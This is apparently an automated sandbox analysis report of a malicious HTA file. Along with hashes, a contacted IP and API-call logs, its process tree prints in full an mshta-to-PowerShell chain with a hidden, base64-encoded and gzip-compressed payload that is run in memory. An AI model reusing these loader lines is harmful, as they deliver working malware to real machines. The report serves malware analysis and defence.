Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 3, 2025, 2:46 p.m.	March 3, 2025, 2:55 p.m.

Size	7.1KB
Type	HTML document, ASCII text, with very long lines
MD5	`9e964c9d47bed0f02f4cf55b858d20b8`
SHA256	`5a86948f96c1266f0a267d99203a7a65a169527db653ca3d987267a0c22eab95`
CRC32	`55984C88`
ssdeep	`192:m+n2jh1hqT2MsBxmpVpP3Rty7MwhQajY/F6hd9d:m+n2jh1hscBspVpP33p0Qaj3hd9d`
Yara	Antivirus - Contains references to security software

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\shell.hta
2052
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBVADEAaQBtAGMAQwBBADcAVgBXAGIAVwArAGIAUwBCAEQAKwBYAHEAbgAvAEEAVgBWAEkAZwBPAHsAMQB9ADQAdgBVACcAJwArACcAJwBrAHsAMQB9AHEAZABLAEIAWAAzAEYATQBZAG8AZQBBAFkALwB1AHMAMAB3AFkAVwB2AFAASABDAHUAJwAnACsAJwAnAHIARABFAEwANwAzACsAOQB4AHMAdwB4AE8AawBsAHUAYwB1AGQAMQBKAFUAcwB3ACsAegBNADcATwB3AHoAegA4AHoAZwBKAGEASABEAEMAUQBzAEYAeAAvAHMAYwBDAGQAOAAvAGYAaABEAHkATgBVAEkAUgBDAGcAUgBaAGoARQBmAG0ARABwAFUARQBjAGQATgB7ADEAfQBqAHAAdABpADUASwArAEYAcgA0AEkAJwAnACsAJwAnADgAVgA5AGYAcgBOAGcAcwBRAEMAUgBjAFgARgA2ADAAawBpAG4ARABJAEQAKwAvAGwASAB1AFoAcQBIAE8AUABnAG4AaABJAGMAeQA0AHIAdwBwAHoAQgBaADQAZwBpAGYAWABOADgALwBZAEkAYwBMADMAdwBYAHgAagAzAEsAUABzAG4AdABFAGMANwBWAGQAQwB6AGwATABMAEoAeQBvAG8AWgB2AHUARABaAG0ARAAwAHMARAAnACcAKwAnACcASwA1AHAAbwBTAEwAawB1AC8ALwB5ADQAcAA4ADUAUABhAG8AdAB6ADUAbABpAEEAYQB5ADUASwA1AGkAegBrAE8AeQBpADYAbABrAGkATAA4AFUATgBJAEQAYgAzAGQAcgBMAEUAcwAnACcAKwAnACcARwBjAFMASQBXAE0ANAArAFgASgB5AFIAcwAxAE0AdABXACcAJwArACcAJwBHAEMAJwAnACsAJwAnAE0AUABYADQARwAzAFIAMgB4AGcAdgBtAFIAdQBMAE0ARgBkAGoAcgBlAEoATQBFACsAaQBNAEwAdABVADYAdQBXAGcASQAwAHYAdwBPAEkAcQBZAG8ANwBwAHUAaABPAE4AWQBLAGcAbgB6ADEAUAA5ADgAcwBmAGgATgBuAHUAZQBIADMAeQBRAGgASgB3AEUAdQA2AHkASABIAEUAVgB1AGIATwBIAG8AawBEAG8ANwBMAGYAUgBTADYARgBOADkAZwBiAHcARgBXAEoAbwA5AEkANgBDADgAVQBCAGQAUQBlADIAUQByAEwAWQBwAGgAUQBXAGgATAArAGkAeAB2ADUAQwBtADgASwA2AE4ANQByAEoARAA4ADMAQQBxADAAUgBqADUAUQBTAFoAUAB7ADEAfQBsAE4AUQAzAG0ASgBoAFEAZgBEAEsAVgBYADQAagB5AFEAUQBJAEYAMQBJAEEASwBnADkAeQBNAEYAMABDAHYASQB3AHgAdgBxAEsAOQB3ADUAQwBvAG8AMQB6ADMAWQB3AEIAQwB5AFAAVwBFAHcAeQAyADYAOQBDAHQAUwBRAFkAYwBEAGIAaQBMAE4AcgBCAHEAMwBnAGIASgBWAGgAWgBQAE0ARQB0AGkAUABTADAAOQBGADUAZgB0AGMASQBRAHoARABZAHgAQwBPAFkAMgBJACsANwBpAGEAUAA1AHsAMQB9ADUAawBXAGkATgA3AGEAcAAwAHQAcwA4AGIAbQBPACcAJwArACcAJwBQAGgATABpADkAQwAxAEYAQQBuAEkASwBxADgAbQB2ADUAdwBCADcARgBHAFIAegBsAFEAdQAwAEsANABwAE8AbABmAEEATwA3AGIAVQB5AHgAagAzAGcASwBjAFUAcQBMAEYAMgBhAGQAZwBQAEEAbgBXAHkAMABoADEATQBXAFIANgBrAEIATwBZADQAZwBLADAAcQAzADgASABNAHcAaABhADcASwBrAGgAdwBZAE8AQQBMAHIARABPAC8AQgBVADkASwBCAEEAYwBLAEcAZABGACcAJwArACcAJwA4AFcAdQBPAEQAMQA5AEIAeQBXAHAAUgBWAEUAYwBsADQAUgBSAEEAaABYAHEAbABBAFEAewAxAH0ASQA0AHIAZABrAHEAQwBHAE0AYwBtADMAMQBJAFMAegA3AEYARQA2AGgAbQBzAGsAbABCAE0ASAB4AGIAeAB3AHQAMQBEACsAQgBtAGQAKwBiAEkAdQBGAE0AWQA4AFMAQgA1AEkASwBFAE4AeQBhAGEAKwB3AFEAUgBGAE4ARQBTAGsASwBmAHUARgBqAGIAbQBjAFEAdgBqAHAAZAAnACcAKwAnACcAZQB4AGEATwBGAEsASQBYAEsAQQBVACsAUABrAEEAKwBRAHAARABpAFkAUABLAFYASwBCAEoARQBDAEwAWgBTAHkAaQBiAGsAZQByAEMAawBPAFEAQwBQAHIARgAxADIASwBmAE8AZwBPAGUAWABWAGsAegBFAEkAKwBkAHEAVQAzAHcAaQB5AHEANABFACcAJwArACcAJwBEADUARgBKAGMAQwBrAEcAZABCAFEAcgBKAE4AeQBuAGgASgBzAEUAbgBFAG8AZgB1AGsARwBHAC8AaQAvAHgASABCAHkANQA2AHsAMQB9AGgAZABLAEsAYwBKADQAWQB1AFMAaQB0AHUAYgBiAGoASwBmAG4ARgBBAEsAZgA4AHoATQBIAEoAbwBJAGcANAB3AE4AQwBOAFcASwBDAGgARwBKADgAMgBEACsAMQBGAC8AbABTADUASgBpADAAVgAxAGwAUQBQAHEAZQBGAG8ASwAxAEoAewAxAH0ATgA2AFMAbQBHAC8AQwB6AFMARQBOAG4ANwB7ADEAfQBQADMAYwAnACcAKwAnACcAdgBEAFEAcgAwAHsAMQB9AHQANwBkAEoAewAxAH0AOQBWAGcAMwArAHEAUAAyAHUATgA5AHYAUABnADUATQB1ADgAbgBOAGoAcwA0AHYAUgB6AG8AMwBPAG4AYwBQAEQANgBiAGEAdgA3AEcAbQBmAEsAYQByAC8AVgB0AFMAWABVADIAYgArAC8AVwBBADcATQAyAGgANgBrADYAMwBsAGQATwA5AHQAdAA5AFUAdABlADMAKwB3AFgAZQA5AGEAZAB2AHoALwBEAFAAUAB2AEsAbAA5ADcAcABMAGgAcABEAFgAVwBxAG4AVQAwAGIASABlAFMANAAnACcAKwAnACcAVQB7ADEAfQBiAGEATgBWAG0AMwBDAEcAYgAvAHAAaABZADQAOQBXAGcAeQArACsAbgBOAGsAVwBXAFYALwBIAHYAYQB1AGUASQBiAEkAZgBSAGcAMQAxAGoAeABsADUAWAAxAGQANgB5ADQAZQB3AEgAbgB0ADEAYgBHAHUANQB1ADIAcQArAGMAewAxAH0ANQBvAHIAdABhAE8AcQByAGIAQgBqAGQAegBWADIATwAnACcAKwAnACcAZABVAGkAZABWAFMAeAByAGEANAAyAHQAagByAGEAZQBBAHkAeQBVADcALwBpAE4AVQBGAEcANgAnACcAKwAnACcANgB5AEwAKwB1AHYAZAB4AHUASgBNADkAVgBVAHQAYQBZAFkAQgBXAG0AbwB7ADEAfQB1ADAANQBtADYANwB1AGIASgBmAGoAcQBRAGcAaABHAHAAZAByAFUAWABiAHgAbABYADQAWQB7ADEAfQBZAGoAOQBXAGIATgBTADcANABqAE8AMQBOAFcAagBXADMARAB0ADcAMwA2ACsAagA1AFcAQgBtAEoAOABQAHoAVwBlAHgAMgBCAHUAMgBOAHAAawA1AHIAbgBZAEgAVwA3AHEAbQBkAEcAOAB2AHEAegBpAGIAJwAnACsAJwAnADIAYQBqAGEANQBwAGIATwBKAFYAWgBzAHgANwBHAHcAcQBTAC8AQgBCAHMASABaAHQAcgArADQAcgBSAHMALwBYAGwAOQB1AGEARAAyAGUAZABaAGYANABEAEUAdABEADcAdQBsACcAJwArACcAJwBzADUAdAA3ADUAbwA0AGUAYgBTAEgAegAzADYANwBuAGgAeQBkAHIATwA5ADIAJwAnACsAJwAnAHQAMwBYAG0AVwBwAFYASwB2AFkAbgBTAFAAWABjAEkAaQBGAHYAMQBCAGMAaQBZAG0AawBmAC8AUABoAEIAMwBFAEEAUABmADUAYgB3AHQANQBxADgAZwBhAEoANABpAFMAZwBRAEEAZABwADMAVQBZAHAAZABGAG4AWAB6AGoAagB4AGkASgBMAFcAUQA1AFcAeQBzAHIAMwBBAFUAWQBnAHEAagBFAEkAWgBsAHcAVwBHAFYAVQB1AGEAawA4AHkARAB0ADMAewAxAH0AQwBLAEQAZwBNAGkAbgBWAGUAVwBuAHMAWAAwADIAcABNAGkAUABDAGsAcQB4AHoAbABSAGkAQwA0AHUAWgBoAEEAawBsAEEAVQBFAFAATQBTAGgAegA1AGUAbAA2AHIAWgBSAHIAVQBKAC8AcgAyADYAcgB6AFkAegAvADcANwA5AFkAaQA2ADEAJwAnACsAJwAnADMAcwBwAGcAVwBVAEQAVQB0AE4AOQBnADkAZQBLAGEAWgBaADMAQgBHAFAARQBHAFcAZgB6ADEAUQA4AEEAMwBBAG8AUwBHADkAQwBkAFYAYgBxAE0ASABSAEsAMgBnAGcAMABNADgATwBoAFoAMQBpAHAAegBGAEcAbgB5AE8AWABYACsAdQBKAEIAawBmAGcAQQBMAEUAYQAzAEgAdQBlAEQAbgA5AGcAQgAxAGkAZgA0AEcAKwBDAHkATgBQAFIAKwBIAHoAVQBpAGoASABWADEARgA5AEwAbQBMAHcANwBMAGUASABQAC8AUgBmAEMASABHAFgALwBzAFAAcwB1AEUAbABWAEwAQgAyAHgAZQBpAEgAOABXAFAATwB2AHEAdgB4AEMAQgBDAFMASQBjAE4ARQAzAG8AcwB4AFEAZgBwAHYANgByAFEATwBSAEYAOABpAHkALwBhAFgAYQBnAEMATAB4ADgAcABaAC8AQgAxAHcAawAvAHUAWQBJAFAAcQA2AHoAUgAvAHcAWABqADkAawBmAG8AZgB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBUACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
  2164
  - powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKU1imcCA7VWbW+bSBD+Xqn/AVVIgO{1}4vU'+'k{1}qdKBX3FMYoeAY/us0wYWvPHCu'+'rDEL73+9xswxOklucud1JUsw+zM7Owzz8zgJaHDCQsFx/scCd8/fhDyNUIRCgRZjEfmDpUEcdN{1}jpti5K+Fr4I'+'8V9frNgsQCRcXF60kinDID+/lHuZqHOPgnhIcy4rwpzBZ4gifXN8/YIcL3wXxj3KPsntEc7VdCzlLLJyooZvuDZmD0sD'+'K5poSLku//y4p85Paotz5liAay5K5izkOyi6lkiL8UNIDb3drLEs'+'GcSIWM4+XJyRs1MtW'+'GC'+'MPX4G3R2xgvmRuLMFdjreJME+iMLtU6uWgI0vwOIqYo7puhONYKgnz1P98sfhNnueH3yQhJwEu6yHHEVubOHokDo7LfRS6FN9gbwFWJo9I6C8UBdQe2QrLYphQWhL+ixv5Cm8K6N5rJD83Aq0Rj5QSZP{1}lNQ3mJhQfDKVX4jyQQIF1IAKg9yMF0CvIwxvqK9w5Coo1z3YwBCyPWEwy269CtSQYcDbiLNrBq3gbJVhZPMEtiPS09F5ftcIQzDYxCOY2I+7iaP5{1}5kWiN7ap0ts8bmO'+'PhLi9C1FAnIKq8mv5wB7FGRzlQu0K4pOlfAO7bUyxj3gKcUqLF2adgPAnWy0h1MWR6kBOY4gK0q38HMwha7KkhwYOALrDO/BU9KBAcKGdF'+'8WuOD19ByWpRVEcl4RRAhXqlAQ{1}I4rdkqCGMcm31ISz7FE6hmsklBMHxbxwt1D+Bmd+bIuFMY8SB5IKENyaa+wQRFNESkKfuFjbmcQvjpd'+'exaOFKIXKAU+PkA+QpDiYPKVKBJECLZSyibkerCkOQCPrF12KfOgOeXVkzEI+dqU3wiyq4E'+'D5FJcCkGdBQrJNynhJsEnEofukGG/i/xHBy56{1}hdKKcJ4YuSitubbjKfnFAKf8zMHJoIg4wNCNWKChGJ82D+1F/lS5Ji0V1lQPqeFoK1J{1}N6SmG/CzSENn7{1}P3c'+'vDQr0{1}t7dJ{1}9Vg3+qP2uN9vPg5Mu8nNjs4vRzo3OncPD6bav7GmfKar/VtSXU2b+/WA7M2h6k63ldO9tt9Ute3+wXe9advz/DPPvKl97pLhpDXWqnU0bHeS4'+'U{1}baNVm3CGb/phY49Wgy++nNkWWV/HvaueIbIfRg11jxl5X1d6y4ewHnt1bGu5u2q+c{1}5ortaOqrbBjdzV2O'+'dUidVSxra42tjraeAyyU7/iNUFG6'+'6yL+uvdxuJM9VUtaYYBWmo{1}u05m67ubJfjqQghGpdrUXbxlX4Y{1}Yj9WbNS74jO1NWjW3Dt736+j5WBmJ8PzWex2Bu2Npk5rnYHW7qmdG8vqzib'+'2aja5pbOJVZsx7GwqS/BBsHZtr+4rRs/Xl9uaD2edZf4DEtD7ul'+'s5t75o4ebSHz367nhydrO92'+'t3XmWpVKvYnSPXcIiFv1BciYmkf/PhB3EAPf5bwt5q8gaJ4iSgQAdp3UYpdFnXzjjxiJLWQ5Wysr3AUYgqjEIZlwWGVUuak8yDt3{1}CKDgMinVeWnsX02pMiPCkqxzlRiC4uZhAklAUEPMShz5el6rZRrUJ/r26rzYz/779Yi61'+'3spgWUDUtN9g9eKaZZ3BGPEGWfz1Q8A3AoSG9CdVbqMHRK2gg0M8OhZ1ipzFGnyOXX+uJBkfgALEa3HueDn9gB1if4G+CyNPR+HzUijHV1F9LmLw7LeHP/RfCHGX/sPsuElVLB2xeiH8WPOvqvxCBCSIcNE3osxQfpv6rQORF8iy/aXagCLx8pZ/B1wk/uYIPq6zR/wXj9kfofwsAAA{0}{0}')-f'=','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
    2308

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
122.114.193.75	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:46 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 3, 2025, 2:46 p.m.			0	0
IsDebuggerPresent March 3, 2025, 2:46 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004553c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455580 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455e00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455880 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00455880 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bc240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bc380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bc380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bc380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bbb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bbb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bbb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bbb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bbb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bbb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 3, 2025, 2:46 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 278 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02730000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2164 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
